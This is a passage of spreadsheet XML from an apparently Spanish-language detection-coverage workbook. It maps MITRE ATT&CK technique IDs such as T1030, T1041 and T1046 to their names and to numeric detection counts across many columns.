      <c r="B11" s="4" t="str">
        <f>IFERROR(VLOOKUP(A11,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1030</v>
      </c>
      <c r="C11" s="493" t="str">
        <f>IFERROR(VLOOKUP(B11,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="D11" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B11)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E11" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>68</v>
      </c>
      <c r="F11" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (68)</v>
      </c>
      <c r="G11" s="292">
        <v>63</v>
      </c>
      <c r="H11" s="322">
        <v>32</v>
      </c>
      <c r="I11" s="322">
        <v>0</v>
      </c>
      <c r="J11" s="12">
        <v>1</v>
      </c>
      <c r="K11" s="13">
        <v>1</v>
      </c>
      <c r="L11" s="394">
        <v>32</v>
      </c>
      <c r="M11" s="322">
        <v>1</v>
      </c>
      <c r="N11" s="322">
        <v>1</v>
      </c>
      <c r="O11" s="322">
        <v>0</v>
      </c>
      <c r="P11" s="12">
        <v>1</v>
      </c>
      <c r="Q11" s="13">
        <v>1</v>
      </c>
      <c r="R11" s="394">
        <v>1</v>
      </c>
      <c r="S11" s="292">
        <v>64</v>
      </c>
      <c r="T11" s="322">
        <v>33</v>
      </c>
      <c r="U11" s="322">
        <v>0</v>
      </c>
      <c r="V11" s="12">
        <v>2</v>
      </c>
      <c r="W11" s="13">
        <v>1</v>
      </c>
      <c r="X11" s="394">
        <v>32</v>
      </c>
      <c r="Y11" s="392">
        <v>63</v>
      </c>
      <c r="Z11" s="392">
        <v>32</v>
      </c>
      <c r="AA11" s="322">
        <v>0</v>
      </c>
      <c r="AB11" s="392">
        <v>1</v>
      </c>
      <c r="AC11" s="16">
        <v>1</v>
      </c>
      <c r="AD11" s="394">
        <v>32</v>
      </c>
      <c r="AE11" s="392">
        <v>99</v>
      </c>
      <c r="AF11" s="392">
        <v>97</v>
      </c>
      <c r="AG11" s="322">
        <v>0</v>
      </c>
      <c r="AH11" s="392">
        <v>7</v>
      </c>
      <c r="AI11" s="16">
        <v>1</v>
      </c>
      <c r="AJ11" s="394">
        <v>34</v>
      </c>
      <c r="AK11" s="392">
        <v>162</v>
      </c>
      <c r="AL11" s="392">
        <v>129</v>
      </c>
      <c r="AM11" s="322">
        <v>0</v>
      </c>
      <c r="AN11" s="392">
        <v>8</v>
      </c>
      <c r="AO11" s="16">
        <v>1</v>
      </c>
      <c r="AP11" s="394">
        <v>34</v>
      </c>
      <c r="AQ11" s="292">
        <v>0</v>
      </c>
      <c r="AR11" s="322">
        <v>0</v>
      </c>
      <c r="AS11" s="322">
        <v>0</v>
      </c>
      <c r="AT11" s="12">
        <v>0</v>
      </c>
      <c r="AU11" s="13">
        <v>0</v>
      </c>
      <c r="AV11" s="394">
        <v>0</v>
      </c>
      <c r="AW11" s="392">
        <v>0</v>
      </c>
      <c r="AX11" s="392">
        <v>0</v>
      </c>
      <c r="AY11" s="322">
        <v>0</v>
      </c>
      <c r="AZ11" s="4">
        <v>0</v>
      </c>
      <c r="BA11" s="16">
        <v>0</v>
      </c>
      <c r="BB11" s="394">
        <v>0</v>
      </c>
      <c r="BC11" s="292">
        <v>64</v>
      </c>
      <c r="BD11" s="322">
        <v>33</v>
      </c>
      <c r="BE11" s="322">
        <v>0</v>
      </c>
      <c r="BF11" s="12">
        <v>2</v>
      </c>
      <c r="BG11" s="13">
        <v>1</v>
      </c>
      <c r="BH11" s="394">
        <v>32</v>
      </c>
      <c r="BI11" s="292">
        <v>9</v>
      </c>
      <c r="BJ11" s="322">
        <v>5</v>
      </c>
      <c r="BK11" s="322">
        <v>0</v>
      </c>
      <c r="BL11" s="12">
        <v>2</v>
      </c>
      <c r="BM11" s="13">
        <v>1</v>
      </c>
      <c r="BN11" s="394">
        <v>5</v>
      </c>
      <c r="BO11" s="292">
        <v>62</v>
      </c>
      <c r="BP11" s="322">
        <v>33</v>
      </c>
      <c r="BQ11" s="322">
        <v>0</v>
      </c>
      <c r="BR11" s="12">
        <v>2</v>
      </c>
      <c r="BS11" s="12">
        <v>3</v>
      </c>
      <c r="BT11" s="13">
        <v>1</v>
      </c>
      <c r="BU11" s="394">
        <v>33</v>
      </c>
      <c r="BV11" s="292">
        <v>0</v>
      </c>
      <c r="BW11" s="322">
        <v>0</v>
      </c>
      <c r="BX11" s="322">
        <v>0</v>
      </c>
      <c r="BY11" s="12">
        <v>0</v>
      </c>
      <c r="BZ11" s="13">
        <v>0</v>
      </c>
      <c r="CA11" s="394">
        <v>0</v>
      </c>
      <c r="CB11" s="292">
        <v>0</v>
      </c>
      <c r="CC11" s="322">
        <v>0</v>
      </c>
      <c r="CD11" s="322">
        <v>0</v>
      </c>
      <c r="CE11" s="12">
        <v>0</v>
      </c>
      <c r="CF11" s="12">
        <v>0</v>
      </c>
      <c r="CG11" s="13">
        <v>0</v>
      </c>
      <c r="CH11" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:93" ht="15" customHeight="1">
      <c r="A12" s="4">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="B12" s="4" t="str">
        <f>IFERROR(VLOOKUP(A12,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1033</v>
      </c>
      <c r="C12" s="493" t="str">
        <f>IFERROR(VLOOKUP(B12,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="D12" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B12)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E12" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F12" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (13)</v>
      </c>
      <c r="G12" s="292">
        <v>0</v>
      </c>
      <c r="H12" s="322">
        <v>0</v>
      </c>
      <c r="I12" s="322">
        <v>0</v>
      </c>
      <c r="J12" s="12">
        <v>0</v>
      </c>
      <c r="K12" s="13">
        <v>0</v>
      </c>
      <c r="L12" s="394">
        <v>0</v>
      </c>
      <c r="M12" s="322">
        <v>0</v>
      </c>
      <c r="N12" s="322">
        <v>0</v>
      </c>
      <c r="O12" s="322">
        <v>0</v>
      </c>
      <c r="P12" s="12">
        <v>0</v>
      </c>
      <c r="Q12" s="13">
        <v>0</v>
      </c>
      <c r="R12" s="394">
        <v>0</v>
      </c>
      <c r="S12" s="292">
        <v>0</v>
      </c>
      <c r="T12" s="322">
        <v>0</v>
      </c>
      <c r="U12" s="322">
        <v>0</v>
      </c>
      <c r="V12" s="12">
        <v>0</v>
      </c>
      <c r="W12" s="13">
        <v>0</v>
      </c>
      <c r="X12" s="394">
        <v>0</v>
      </c>
      <c r="Y12" s="392">
        <v>5</v>
      </c>
      <c r="Z12" s="392">
        <v>2</v>
      </c>
      <c r="AA12" s="322">
        <v>0</v>
      </c>
      <c r="AB12" s="392">
        <v>2</v>
      </c>
      <c r="AC12" s="16">
        <v>1</v>
      </c>
      <c r="AD12" s="394">
        <v>1</v>
      </c>
      <c r="AE12" s="392">
        <v>25</v>
      </c>
      <c r="AF12" s="392">
        <v>17</v>
      </c>
      <c r="AG12" s="322">
        <v>0</v>
      </c>
      <c r="AH12" s="392">
        <v>17</v>
      </c>
      <c r="AI12" s="16">
        <v>1</v>
      </c>
      <c r="AJ12" s="394">
        <v>2</v>
      </c>
      <c r="AK12" s="392">
        <v>30</v>
      </c>
      <c r="AL12" s="392">
        <v>19</v>
      </c>
      <c r="AM12" s="322">
        <v>0</v>
      </c>
      <c r="AN12" s="392">
        <v>19</v>
      </c>
      <c r="AO12" s="16">
        <v>1</v>
      </c>
      <c r="AP12" s="394">
        <v>2</v>
      </c>
      <c r="AQ12" s="292">
        <v>0</v>
      </c>
      <c r="AR12" s="322">
        <v>0</v>
      </c>
      <c r="AS12" s="322">
        <v>0</v>
      </c>
      <c r="AT12" s="12">
        <v>0</v>
      </c>
      <c r="AU12" s="13">
        <v>0</v>
      </c>
      <c r="AV12" s="394">
        <v>0</v>
      </c>
      <c r="AW12" s="392">
        <v>0</v>
      </c>
      <c r="AX12" s="392">
        <v>0</v>
      </c>
      <c r="AY12" s="322">
        <v>0</v>
      </c>
      <c r="AZ12" s="4">
        <v>0</v>
      </c>
      <c r="BA12" s="16">
        <v>0</v>
      </c>
      <c r="BB12" s="394">
        <v>0</v>
      </c>
      <c r="BC12" s="292">
        <v>0</v>
      </c>
      <c r="BD12" s="322">
        <v>0</v>
      </c>
      <c r="BE12" s="322">
        <v>0</v>
      </c>
      <c r="BF12" s="12">
        <v>0</v>
      </c>
      <c r="BG12" s="13">
        <v>0</v>
      </c>
      <c r="BH12" s="394">
        <v>0</v>
      </c>
      <c r="BI12" s="292">
        <v>0</v>
      </c>
      <c r="BJ12" s="322">
        <v>0</v>
      </c>
      <c r="BK12" s="322">
        <v>0</v>
      </c>
      <c r="BL12" s="12">
        <v>0</v>
      </c>
      <c r="BM12" s="13">
        <v>0</v>
      </c>
      <c r="BN12" s="394">
        <v>0</v>
      </c>
      <c r="BO12" s="292">
        <v>10</v>
      </c>
      <c r="BP12" s="322">
        <v>9</v>
      </c>
      <c r="BQ12" s="322">
        <v>0</v>
      </c>
      <c r="BR12" s="12">
        <v>0</v>
      </c>
      <c r="BS12" s="12">
        <v>5</v>
      </c>
      <c r="BT12" s="13">
        <v>1</v>
      </c>
      <c r="BU12" s="394">
        <v>7</v>
      </c>
      <c r="BV12" s="292">
        <v>4</v>
      </c>
      <c r="BW12" s="322">
        <v>1</v>
      </c>
      <c r="BX12" s="322">
        <v>0</v>
      </c>
      <c r="BY12" s="12">
        <v>1</v>
      </c>
      <c r="BZ12" s="13">
        <v>1</v>
      </c>
      <c r="CA12" s="394">
        <v>1</v>
      </c>
      <c r="CB12" s="292">
        <v>9</v>
      </c>
      <c r="CC12" s="322">
        <v>2</v>
      </c>
      <c r="CD12" s="322">
        <v>0</v>
      </c>
      <c r="CE12" s="12">
        <v>1</v>
      </c>
      <c r="CF12" s="12">
        <v>1</v>
      </c>
      <c r="CG12" s="13">
        <v>1</v>
      </c>
      <c r="CH12" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:93" ht="15" customHeight="1">
      <c r="A13" s="4">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="B13" s="4" t="str">
        <f>IFERROR(VLOOKUP(A13,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1039</v>
      </c>
      <c r="C13" s="493" t="str">
        <f>IFERROR(VLOOKUP(B13,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="D13" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B13)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E13" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F13" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (3)</v>
      </c>
      <c r="G13" s="292">
        <v>1</v>
      </c>
      <c r="H13" s="322">
        <v>1</v>
      </c>
      <c r="I13" s="322">
        <v>0</v>
      </c>
      <c r="J13" s="12">
        <v>1</v>
      </c>
      <c r="K13" s="13">
        <v>1</v>
      </c>
      <c r="L13" s="394">
        <v>1</v>
      </c>
      <c r="M13" s="322">
        <v>0</v>
      </c>
      <c r="N13" s="322">
        <v>0</v>
      </c>
      <c r="O13" s="322">
        <v>0</v>
      </c>
      <c r="P13" s="12">
        <v>0</v>
      </c>
      <c r="Q13" s="13">
        <v>0</v>
      </c>
      <c r="R13" s="394">
        <v>0</v>
      </c>
      <c r="S13" s="292">
        <v>1</v>
      </c>
      <c r="T13" s="322">
        <v>1</v>
      </c>
      <c r="U13" s="322">
        <v>0</v>
      </c>
      <c r="V13" s="12">
        <v>1</v>
      </c>
      <c r="W13" s="13">
        <v>1</v>
      </c>
      <c r="X13" s="394">
        <v>1</v>
      </c>
      <c r="Y13" s="392">
        <v>2</v>
      </c>
      <c r="Z13" s="392">
        <v>2</v>
      </c>
      <c r="AA13" s="322">
        <v>0</v>
      </c>
      <c r="AB13" s="392">
        <v>2</v>
      </c>
      <c r="AC13" s="16">
        <v>1</v>
      </c>
      <c r="AD13" s="394">
        <v>1</v>
      </c>
      <c r="AE13" s="392">
        <v>20</v>
      </c>
      <c r="AF13" s="392">
        <v>20</v>
      </c>
      <c r="AG13" s="322">
        <v>0</v>
      </c>
      <c r="AH13" s="392">
        <v>18</v>
      </c>
      <c r="AI13" s="16">
        <v>1</v>
      </c>
      <c r="AJ13" s="394">
        <v>3</v>
      </c>
      <c r="AK13" s="392">
        <v>22</v>
      </c>
      <c r="AL13" s="392">
        <v>22</v>
      </c>
      <c r="AM13" s="322">
        <v>0</v>
      </c>
      <c r="AN13" s="392">
        <v>20</v>
      </c>
      <c r="AO13" s="16">
        <v>1</v>
      </c>
      <c r="AP13" s="394">
        <v>3</v>
      </c>
      <c r="AQ13" s="292">
        <v>0</v>
      </c>
      <c r="AR13" s="322">
        <v>0</v>
      </c>
      <c r="AS13" s="322">
        <v>0</v>
      </c>
      <c r="AT13" s="12">
        <v>0</v>
      </c>
      <c r="AU13" s="13">
        <v>0</v>
      </c>
      <c r="AV13" s="394">
        <v>0</v>
      </c>
      <c r="AW13" s="392">
        <v>0</v>
      </c>
      <c r="AX13" s="392">
        <v>0</v>
      </c>
      <c r="AY13" s="322">
        <v>0</v>
      </c>
      <c r="AZ13" s="4">
        <v>0</v>
      </c>
      <c r="BA13" s="16">
        <v>0</v>
      </c>
      <c r="BB13" s="394">
        <v>0</v>
      </c>
      <c r="BC13" s="292">
        <v>1</v>
      </c>
      <c r="BD13" s="322">
        <v>1</v>
      </c>
      <c r="BE13" s="322">
        <v>0</v>
      </c>
      <c r="BF13" s="12">
        <v>1</v>
      </c>
      <c r="BG13" s="13">
        <v>1</v>
      </c>
      <c r="BH13" s="394">
        <v>1</v>
      </c>
      <c r="BI13" s="292">
        <v>0</v>
      </c>
      <c r="BJ13" s="322">
        <v>0</v>
      </c>
      <c r="BK13" s="322">
        <v>0</v>
      </c>
      <c r="BL13" s="12">
        <v>0</v>
      </c>
      <c r="BM13" s="13">
        <v>0</v>
      </c>
      <c r="BN13" s="394">
        <v>0</v>
      </c>
      <c r="BO13" s="292">
        <v>5</v>
      </c>
      <c r="BP13" s="322">
        <v>4</v>
      </c>
      <c r="BQ13" s="322">
        <v>0</v>
      </c>
      <c r="BR13" s="12">
        <v>0</v>
      </c>
      <c r="BS13" s="12">
        <v>4</v>
      </c>
      <c r="BT13" s="13">
        <v>1</v>
      </c>
      <c r="BU13" s="394">
        <v>1</v>
      </c>
      <c r="BV13" s="292">
        <v>0</v>
      </c>
      <c r="BW13" s="322">
        <v>0</v>
      </c>
      <c r="BX13" s="322">
        <v>0</v>
      </c>
      <c r="BY13" s="12">
        <v>0</v>
      </c>
      <c r="BZ13" s="13">
        <v>0</v>
      </c>
      <c r="CA13" s="394">
        <v>0</v>
      </c>
      <c r="CB13" s="292">
        <v>1</v>
      </c>
      <c r="CC13" s="322">
        <v>1</v>
      </c>
      <c r="CD13" s="322">
        <v>0</v>
      </c>
      <c r="CE13" s="12">
        <v>0</v>
      </c>
      <c r="CF13" s="12">
        <v>1</v>
      </c>
      <c r="CG13" s="13">
        <v>1</v>
      </c>
      <c r="CH13" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:93" ht="15" customHeight="1">
      <c r="A14" s="4">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="B14" s="4" t="str">
        <f>IFERROR(VLOOKUP(A14,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1041</v>
      </c>
      <c r="C14" s="493" t="str">
        <f>IFERROR(VLOOKUP(B14,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="D14" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B14)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E14" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F14" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (2)</v>
      </c>
      <c r="G14" s="292">
        <v>0</v>
      </c>
      <c r="H14" s="322">
        <v>0</v>
      </c>
      <c r="I14" s="322">
        <v>0</v>
      </c>
      <c r="J14" s="12">
        <v>0</v>
      </c>
      <c r="K14" s="13">
        <v>0</v>
      </c>
      <c r="L14" s="394">
        <v>0</v>
      </c>
      <c r="M14" s="322">
        <v>8</v>
      </c>
      <c r="N14" s="322">
        <v>4</v>
      </c>
      <c r="O14" s="322">
        <v>0</v>
      </c>
      <c r="P14" s="12">
        <v>4</v>
      </c>
      <c r="Q14" s="13">
        <v>1</v>
      </c>
      <c r="R14" s="394">
        <v>2</v>
      </c>
      <c r="S14" s="292">
        <v>8</v>
      </c>
      <c r="T14" s="322">
        <v>4</v>
      </c>
      <c r="U14" s="322">
        <v>0</v>
      </c>
      <c r="V14" s="12">
        <v>4</v>
      </c>
      <c r="W14" s="13">
        <v>1</v>
      </c>
      <c r="X14" s="394">
        <v>2</v>
      </c>
      <c r="Y14" s="392">
        <v>7</v>
      </c>
      <c r="Z14" s="392">
        <v>3</v>
      </c>
      <c r="AA14" s="322">
        <v>0</v>
      </c>
      <c r="AB14" s="392">
        <v>2</v>
      </c>
      <c r="AC14" s="16">
        <v>1</v>
      </c>
      <c r="AD14" s="394">
        <v>2</v>
      </c>
      <c r="AE14" s="392">
        <v>25</v>
      </c>
      <c r="AF14" s="392">
        <v>11</v>
      </c>
      <c r="AG14" s="322">
        <v>0</v>
      </c>
      <c r="AH14" s="392">
        <v>10</v>
      </c>
      <c r="AI14" s="16">
        <v>1</v>
      </c>
      <c r="AJ14" s="394">
        <v>2</v>
      </c>
      <c r="AK14" s="392">
        <v>32</v>
      </c>
      <c r="AL14" s="392">
        <v>14</v>
      </c>
      <c r="AM14" s="322">
        <v>0</v>
      </c>
      <c r="AN14" s="392">
        <v>12</v>
      </c>
      <c r="AO14" s="16">
        <v>1</v>
      </c>
      <c r="AP14" s="394">
        <v>2</v>
      </c>
      <c r="AQ14" s="292">
        <v>0</v>
      </c>
      <c r="AR14" s="322">
        <v>0</v>
      </c>
      <c r="AS14" s="322">
        <v>0</v>
      </c>
      <c r="AT14" s="12">
        <v>0</v>
      </c>
      <c r="AU14" s="13">
        <v>0</v>
      </c>
      <c r="AV14" s="394">
        <v>0</v>
      </c>
      <c r="AW14" s="392">
        <v>0</v>
      </c>
      <c r="AX14" s="392">
        <v>0</v>
      </c>
      <c r="AY14" s="322">
        <v>0</v>
      </c>
      <c r="AZ14" s="4">
        <v>0</v>
      </c>
      <c r="BA14" s="16">
        <v>0</v>
      </c>
      <c r="BB14" s="394">
        <v>0</v>
      </c>
      <c r="BC14" s="292">
        <v>8</v>
      </c>
      <c r="BD14" s="322">
        <v>4</v>
      </c>
      <c r="BE14" s="322">
        <v>0</v>
      </c>
      <c r="BF14" s="12">
        <v>4</v>
      </c>
      <c r="BG14" s="13">
        <v>1</v>
      </c>
      <c r="BH14" s="394">
        <v>2</v>
      </c>
      <c r="BI14" s="292">
        <v>0</v>
      </c>
      <c r="BJ14" s="322">
        <v>0</v>
      </c>
      <c r="BK14" s="322">
        <v>0</v>
      </c>
      <c r="BL14" s="12">
        <v>0</v>
      </c>
      <c r="BM14" s="13">
        <v>0</v>
      </c>
      <c r="BN14" s="394">
        <v>0</v>
      </c>
      <c r="BO14" s="292">
        <v>2</v>
      </c>
      <c r="BP14" s="322">
        <v>2</v>
      </c>
      <c r="BQ14" s="322">
        <v>0</v>
      </c>
      <c r="BR14" s="12">
        <v>0</v>
      </c>
      <c r="BS14" s="12">
        <v>2</v>
      </c>
      <c r="BT14" s="13">
        <v>1</v>
      </c>
      <c r="BU14" s="394">
        <v>1</v>
      </c>
      <c r="BV14" s="292">
        <v>0</v>
      </c>
      <c r="BW14" s="322">
        <v>0</v>
      </c>
      <c r="BX14" s="322">
        <v>0</v>
      </c>
      <c r="BY14" s="12">
        <v>0</v>
      </c>
      <c r="BZ14" s="13">
        <v>0</v>
      </c>
      <c r="CA14" s="394">
        <v>0</v>
      </c>
      <c r="CB14" s="292">
        <v>0</v>
      </c>
      <c r="CC14" s="322">
        <v>0</v>
      </c>
      <c r="CD14" s="322">
        <v>0</v>
      </c>
      <c r="CE14" s="12">
        <v>0</v>
      </c>
      <c r="CF14" s="12">
        <v>0</v>
      </c>
      <c r="CG14" s="13">
        <v>0</v>
      </c>
      <c r="CH14" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A15" s="4">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="B15" s="4" t="str">
        <f>IFERROR(VLOOKUP(A15,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1046</v>
      </c>
      <c r="C15" s="493" t="str">
        <f>IFERROR(VLOOKUP(B15,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Service Discovery</v>
      </c>
      <c r="D15" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B15)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E15" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>65846</v>
      </c>
      <c r="F15" s="579" t="str">
        <f t="shared" si="1"/>
        <v>3 (65846)</v>
      </c>
      <c r="G15" s="292">
        <v>276</v>
      </c>
      <c r="H15" s="322">
        <v>107</v>
      </c>
      <c r="I15" s="322">
        <v>0</v>
      </c>
      <c r="J15" s="12">
        <v>12</v>
      </c>
      <c r="K15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="L15" s="394">
        <v>87</v>
      </c>
      <c r="M15" s="322">
        <v>858</v>
      </c>
      <c r="N15" s="322">
        <v>305</v>
      </c>
      <c r="O15" s="322">
        <v>0</v>
      </c>
      <c r="P15" s="12">
        <v>123</v>
      </c>
      <c r="Q15" s="13">
        <v>1</v>
      </c>
      <c r="R15" s="394">
        <v>116</v>
      </c>
      <c r="S15" s="292">
        <v>1134</v>
      </c>
      <c r="T15" s="322">
        <v>412</v>
      </c>
      <c r="U15" s="322">
        <v>0</v>
      </c>
      <c r="V15" s="12">
        <v>135</v>
      </c>
      <c r="W15" s="13">
        <v>1</v>
      </c>
      <c r="X15" s="394">
        <v>136</v>
      </c>
      <c r="Y15" s="392">
        <v>15728</v>
      </c>
      <c r="Z15" s="392">
        <v>1260</v>
      </c>
      <c r="AA15" s="322">
        <v>0</v>
      </c>
      <c r="AB15" s="392">
        <v>450</v>
      </c>
      <c r="AC15" s="16">
        <v>1</v>
      </c>
      <c r="AD15" s="394">
        <v>170</v>
      </c>
      <c r="AE15" s="392">
        <v>4184</v>
      </c>
      <c r="AF15" s="392">
        <v>822</v>
      </c>
      <c r="AG15" s="322">
        <v>0</v>
      </c>
      <c r="AH15" s="392">
        <v>338</v>
      </c>
      <c r="AI15" s="16">
        <v>1</v>
      </c>
      <c r="AJ15" s="394">
        <v>142</v>
      </c>
      <c r="AK15" s="392">
        <v>19912</v>
      </c>
      <c r="AL15" s="392">
        <v>2082</v>
      </c>
      <c r="AM15" s="322">
        <v>0</v>
      </c>
      <c r="AN15" s="392">
        <v>788</v>
      </c>
      <c r="AO15" s="16">
        <v>1</v>
      </c>
      <c r="AP15" s="394">
        <v>178</v>
      </c>
      <c r="AQ15" s="292">
        <v>0</v>
      </c>
      <c r="AR15" s="322">
        <v>0</v>
      </c>
      <c r="AS15" s="322">
        <v>0</v>
      </c>
      <c r="AT15" s="12">
        <v>0</v>
      </c>
      <c r="AU15" s="13">
        <v>0</v>
      </c>
      <c r="AV15" s="394">
        <v>0</v>
      </c>
      <c r="AW15" s="392">
        <v>1815</v>
      </c>
      <c r="AX15" s="392">
        <v>629</v>
      </c>
      <c r="AY15" s="322">
        <v>0</v>
      </c>
      <c r="AZ15" s="4">
        <v>346</v>
      </c>
      <c r="BA15" s="16">
        <v>0.66666666666666663</v>
      </c>
      <c r="BB15" s="394">
        <v>128</v>
      </c>
      <c r="BC15" s="292">
        <v>2949</v>
      </c>
      <c r="BD15" s="322">
        <v>1041</v>
      </c>
      <c r="BE15" s="322">
        <v>0</v>
      </c>
      <c r="BF15" s="12">
        <v>481</v>
      </c>
      <c r="BG15" s="13">
        <v>1</v>
      </c>
      <c r="BH15" s="394">
        <v>152</v>
      </c>
      <c r="BI15" s="292">
        <v>702</v>
      </c>
      <c r="BJ15" s="322">
        <v>468</v>
      </c>
      <c r="BK15" s="322">
        <v>0</v>
      </c>
      <c r="BL15" s="12">
        <v>110</v>
      </c>
      <c r="BM15" s="13">
        <v>1</v>
      </c>
      <c r="BN15" s="394">
        <v>171</v>
      </c>
      <c r="BO15" s="292">
        <v>881</v>
      </c>
      <c r="BP15" s="322">
        <v>647</v>
      </c>
      <c r="BQ15" s="322">
        <v>0</v>
      </c>
      <c r="BR15" s="12">
        <v>110</v>
      </c>
      <c r="BS15" s="12">
        <v>10</v>
      </c>
      <c r="BT15" s="13">
        <v>1</v>
      </c>
      <c r="BU15" s="394">
        <v>186</v>
      </c>
      <c r="BV15" s="292">
        <v>103</v>
      </c>
      <c r="BW15" s="322">
        <v>82</v>
      </c>
      <c r="BX15" s="322">
        <v>0</v>
      </c>
      <c r="BY15" s="12">
        <v>48</v>
      </c>
      <c r="BZ15" s="13">
        <v>1</v>
      </c>
      <c r="CA15" s="394">
        <v>51</v>
      </c>
      <c r="CB15" s="292">
        <v>5662</v>
      </c>
      <c r="CC15" s="322">
        <v>250</v>
      </c>
      <c r="CD15" s="322">
        <v>0</v>
      </c>
      <c r="CE15" s="12">
        <v>48</v>
      </c>
      <c r="CF15" s="12">
        <v>5</v>
      </c>
      <c r="CG15" s="13">
        <v>1</v>
      </c>
      <c r="CH15" s="394">
        <v>168</v>
      </c>
    </row>
    <row r="16" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A16" s="4">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="B16" s="4" t="str">
        <f>IFERROR(VLOOKUP(A16,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1047</v>
      </c>
      <c r="C16" s="493" t="str">
        <f>IFERROR(VLOOKUP(B16,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="D16" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B16)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E16" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>912</v>
      </c>
      <c r="F16" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (912)</v>
      </c>
      <c r="G16" s="292">
        <v>13</v>
      </c>
      <c r="H16" s="322">
        <v>5</v>
      </c>
      <c r="I16" s="322">
        <v>0</v>
      </c>
      <c r="J16" s="12">
        <v>3</v>
      </c>
      <c r="K16" s="13">
        <v>1</v>
      </c>
      <c r="L16" s="394">
        <v>3</v>
      </c>
      <c r="M16" s="322">
        <v>1369</v>
      </c>
      <c r="N16" s="322">
        <v>1322</v>
      </c>
      <c r="O16" s="322">
        <v>0</v>
      </c>
      <c r="P16" s="12">
        <v>6</v>
      </c>
      <c r="Q16" s="13">
        <v>1</v>
      </c>
      <c r="R16" s="394">
        <v>878</v>
      </c>
      <c r="S16" s="292">
        <v>1382</v>
      </c>
      <c r="T16" s="322">
        <v>1327</v>
      </c>
      <c r="U16" s="322">
        <v>0</v>
      </c>
      <c r="V16" s="12">
        <v>9</v>
      </c>
      <c r="W16" s="13">
        <v>1</v>
      </c>
      <c r="X16" s="394">
        <v>878</v>
      </c>
      <c r="Y16" s="392">
        <v>959</v>
      </c>
      <c r="Z16" s="392">
        <v>904</v>
      </c>
      <c r="AA16" s="322">
        <v>0</v>
